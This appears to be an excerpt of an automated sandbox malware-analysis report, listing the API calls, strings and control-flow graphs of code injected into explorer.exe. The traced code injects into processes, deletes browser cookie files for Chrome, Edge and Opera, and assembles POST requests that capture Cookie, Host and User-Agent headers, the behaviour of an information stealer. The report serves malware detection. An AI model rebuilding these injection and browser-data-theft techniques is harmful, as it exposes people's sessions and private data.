                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                                        • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                                        • Sleep.KERNEL32(000001F4), ref: 000821F9
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082231
                                                        • CloseHandle.KERNEL32(?), ref: 00082237
                                                        • CloseHandle.KERNEL32(?), ref: 0008223D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082240
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-2737717697
                                                        • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                        • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                                        • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                        • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                        • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                        • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                        • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                        • FindClose.KERNEL32(00000000), ref: 000816AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                        • String ID: *.*$Cookies*
                                                        • API String ID: 4256701249-3228320225
                                                        • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                        • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                                        • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                        • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

                                                        Control-flow Graph

                                                        control_flow_graph 463 814d8-81527 call 813fe call 81000 wsprintfW FindFirstFileW 468 81599-815a6 call 81011 463->468 469 81529 463->469 471 8152b-81530 469->471 473 8157e-8158c FindNextFileW 471->473 474 81532-8153d call 813d7 471->474 473->471 475 8158e-81595 FindClose 473->475 474->473 478 8153f-81565 call 81000 wsprintfW 474->478 475->468 481 81570-81579 DeleteFileW call 81011 478->481 482 81567-8156a SetFileAttributesW 478->482 481->473 482->481
                                                        APIs
                                                          • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                                          • Part of subcall function 000813FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                          • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                                          • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                          • Part of subcall function 000813FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                          • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfW.USER32 ref: 0008150D
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • wsprintfW.USER32 ref: 00081557
                                                        • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • FindClose.KERNEL32(00000000), ref: 0008158F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                        • String ID: %s%s$*.*
                                                        • API String ID: 2055899612-705776850
                                                        • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                        • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                                        • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                        • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfW.USER32 ref: 0008142A
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                        • wsprintfW.USER32 ref: 00081476
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                        • FindClose.KERNEL32(00000000), ref: 000814BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                        • String ID: %s%s$%s%s\$*.*
                                                        • API String ID: 2055899612-4093207852
                                                        • Opcode ID: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                        • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                                        • Opcode Fuzzy Hash: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                        • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                        • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                        • wsprintfA.USER32 ref: 00081205
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                        • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                                        • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                        • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                        • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                                        • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081758
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                        • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                                        • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                        • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                                        APIs
                                                        • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                        • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                        • String ID: NetworkService
                                                        • API String ID: 1656241333-2019834739
                                                        • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                        • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                                        • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                        • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                        • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                                        • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                        • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                                        APIs
                                                        • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                                          • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                          • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                          • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                          • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                        Strings
                                                        • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$InformationQuery$Open
                                                        • String ID: chrome.exe|opera.exe|msedge.exe
                                                        • API String ID: 4117927671-3743313796
                                                        • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                        • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                                        • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                        • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4

                                                        Control-flow Graph

                                                        control_flow_graph 222 82974-829a2 223 829a8-829aa 222->223 224 82b65-82b6d 222->224 223->224 225 829b0-829b9 call 81765 223->225 225->224 228 829bf-829c1 225->228 228->224 229 829c7-829c9 228->229 229->224 230 829cf-829df call 81141 229->230 230->224 233 829e5-82a0d call 81000 * 3 230->233 240 82a11 call 8104c 233->240 241 82a16-82a30 call 8285f 240->241 244 82a4c-82a64 call 8285f 241->244 245 82a32-82a42 call 8285f 241->245 251 82a6e-82a85 call 8285f 244->251 252 82a66-82a6c lstrcat 244->252 245->244 250 82a44-82a4a lstrcat 245->250 250->244 255 82a8f-82ab2 RtlZeroMemory call 8285f 251->255 256 82a87-82a8d lstrcat 251->256 252->251 259 82ac3 255->259 260 82ab4-82ac1 StrToIntA 255->260 256->255 261 82ac7-82ac9 259->261 260->261 262 82acb-82ace 261->262 263 82b42-82b64 call 8105d call 81011 * 3 261->263 262->263 265 82ad0-82ad7 262->265 263->224 265->263 267 82ad9-82adf 265->267 269 82ae5 call 8104c 267->269 271 82aea-82b29 wnsprintfA call 828ad 269->271 277 82b2b-82b2d lstrcat 271->277 278 82b2f-82b3e lstrcat * 2 271->278 277->278 278->263
                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                          • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                          • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                                        • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                                        • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                                        • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                                        • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                                        • wnsprintfA.SHLWAPI ref: 00082B0D
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                        • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                        • API String ID: 2605944266-950501416
                                                        • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                        • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                                        • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                        • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66

                                                        APIs
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                        • StrToIntA.SHLWAPI(?), ref: 00083024
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                        • wsprintfA.USER32 ref: 000830B9
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                        • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                                        • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                        • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                        • API String ID: 2886538537-1627781280
                                                        • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                        • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                                        • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                        • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1

                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                          • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                          • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                                        • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                                          • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                          • Part of subcall function 000815BE: FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                          • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                          • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                          • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                          • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                          • Part of subcall function 000815BE: FindClose.KERNEL32(00000000), ref: 000816AB
                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                                        • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                                        • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                        • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                        • API String ID: 909495591-1175993956
                                                        • Opcode ID: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                        • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                                        • Opcode Fuzzy Hash: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                        • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                          • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                          • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                          • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                          • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                        • Sleep.KERNEL32(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                                        • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                                        • wsprintfW.USER32 ref: 00083644
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                          • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                          • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                          • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                          • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                          • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                          • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                                        • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                        • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                        • API String ID: 2436889709-3669280581
                                                        • Opcode ID: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                        • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                                        • Opcode Fuzzy Hash: 0b2ddade066f348b97ee0b66d3a5b6175cf5d7b387e05ed159d19590711088c2
                                                        • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

Control-flow Graph

Rendered control-flow graph omitted (graph data only; legend: executed / not executed blocks). Function at 00083132, basic blocks 83132-832f1. Block-level calls recoverable from the graph: sub_81000 (x4), sub_81011 (x3), sub_81141, lstrlen (x2), wsprintfA, lstrcat (x2), RtlMoveMemory.
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000), ref: 0008322D
                                                        • wsprintfA.USER32 ref: 0008329E
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                                        • lstrlen.KERNEL32(00000000), ref: 000832C1
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                                          • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                          • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                        • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
